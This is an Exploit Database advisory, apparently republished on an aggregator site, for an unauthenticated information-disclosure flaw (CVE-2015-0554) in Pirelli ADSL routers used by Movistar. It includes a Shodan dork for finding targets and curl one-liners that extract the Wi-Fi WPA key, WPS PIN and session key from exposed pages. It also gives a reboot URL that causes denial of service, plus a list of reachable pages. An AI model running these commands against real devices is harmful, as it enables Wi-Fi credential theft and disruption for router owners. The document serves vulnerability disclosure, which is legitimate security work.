Pirelli ADSL2/2+ Wireless Router P.DGA4001N – Information Disclosure

• Exploit Database
• 37 阅读

• 作者： Eduardo Novella
  日期： 2015-01-07
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35721/

• - Title:
  
  CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001Nremote information disclosure 
  HomeStation Movistar
  
  - Author:
  
  Eduardo Novella@enovella_
  ednolo[@]inf.upv[dot]es
  
  - Version:
  
  Tested on firmware version PDG_TEF_SP_4.06L.6
  
  
  - Shodan dork : 
  + "Dropbear 0.46 country:es"( From now on it looks like not working on this way)
  
  
  - Summary:
  
  HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any 
  IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
  
  
  - The vulnerability and the way to exploit it:
  
  
  $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
  <option value='0'>WLAN_DEAD</option>
  
  $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
  var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
  
  $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
  var WscDevPin= '12820078';
  
  $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
  var sessionKey='1189641421';
  
  $ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
   <td width="50">BSSID:</td>
   <td>
  DC:0B:1A:XX:XX:XX
   </td>
  
  
  
  # Rebooting the router remotely and provoking a Denial of Service
  #-----------------------------------------------------------------
  http://${IP_ADDRESS}/resetrouter.html
  
  We can observe at the source:
  <!-- hide
  
  var sessionKey='846930886';
  function btnReset() {
   var loc = 'rebootinfo.cgi?';
  
   loc += 'sessionKey=' + sessionKey;
  
   var code = 'location="' + loc + '"';
   eval(code);
  }
  
  // done hiding -->
  
  
  http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
  
  
  # All the information what we can fetch from.
  #----------------------------------------------
  webs$ ls
  adslcfgadv.html diagpppoe.htmlipv6lancfg.htmlqoscls.htmlstatsatmreset.html
  adslcfgc.html dlnacfg.htmljs qosqmgmt.htmlstatsifc.html
  adslcfg.htmldnscfg.html jsps qosqueueadd.html statsifcreset.html
  adslcfgtone.htmldnsproxycfg.htmllancfg2.html qsmain.htmlstatsmocalanreset.html
  algcfg.html dsladderr.htmllanguagesquicksetuperr.html statsmocareset.html
  APISdslbondingcfg.htmllockerror.html quicksetup.htmlstatsmocawanreset.html
  atmdelerr.htmlenblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
  backupsettings.html enblservice.htmllogintro.htmlquicksetuptestsucc.htmlstatsvdslreset.html
  berrun.html engdebug.html logobkg.gifrebootinfo.htmlstatswanreset.html
  berstart.html ethadderr.htmllogoc.gifresetrouter.html statsxtmreset.html
  berstop.htmlethdelerr.htmllogo_corp.gifrestoreinfo.html storageusraccadd.html
  certadd.htmlfooter.html logo.htmlrouteadd.htmlstylemain.css
  certcaimport.html hlpadslsync.htmllogomenu.gif rtdefaultcfgerr.html threeGPIN.html
  certimport.html hlpatmetoe.html main.htmlrtdefaultcfg.htmltodadd.html
  certloadsigned.html hlpatmseg.htmlmenuBcm.js scdmz.html tr69cfg.html
  cfgatm.html hlpethconn.html menu.htmlscinflt.html updatesettings.html
  cfgeth.html hlppngdns.htmlmenuTitle.js scmacflt.htmlupload.html
  cfgl2tpac.htmlhlppnggw.html menuTree.jsscmacpolicy.html uploadinfo.html
  cfgmoca.htmlhlppppoasess.html mocacfg.html scoutflt.htmlupnpcfg.html
  cfgptm.html hlppppoeauth.html multicast.html scprttrg.htmlurl_add.html
  colors.csshlppppoeconn.html natcfg2.html scriptsutil.js
  config.json.txt hlppppoeip.html ntwksum2.htmlscvrtsrv.htmlwanadderr.html
  css hlptstdns.htmlomcidownload.htmlseclogintro.html wancfg.html
  ddnsadd.htmlhlpusbconn.html omcisystem.htmlsnmpconfig.htmlwlcfgadv.html
  defaultsettings.htmlhlpwlconn.htmlpassword.htmlsntpcfg.html wlcfg.html
  dhcpinfo.html htmlportmapadd.htmlstandby.html wlcfgkey.html
  diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
  diagbr.html ifcgateway.html portName.jsStaticIpErr.html wlrefresh.html
  diag.html imagespppoe.html statsadslerr.htmlwlsecurity.html
  diagipow.html index.htmlpradd.html statsadsl.html wlsetup.html
  diaglan.htmlinfo.html ptmadderr.html statsadslreset.htmlwlwapias.html
  diagmer.htmlipoacfg.htmlptmdelerr.html statsatmerr.html xdslcfg.html
  diagpppoa.htmlippcfg.html pwrmngt.html statsatm.html
  
  
  
  + Conclusion:
  
  This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
   or even worse being a member of a botnet without knowledge of it. 
  First mitigation could beeither try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
  
  
  
  + References:
  
  http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
  
  
  
  + Timeline:
  
  2013-04-xx Send email to Movistar and Pirelli
  2015-01-05 Full disclosure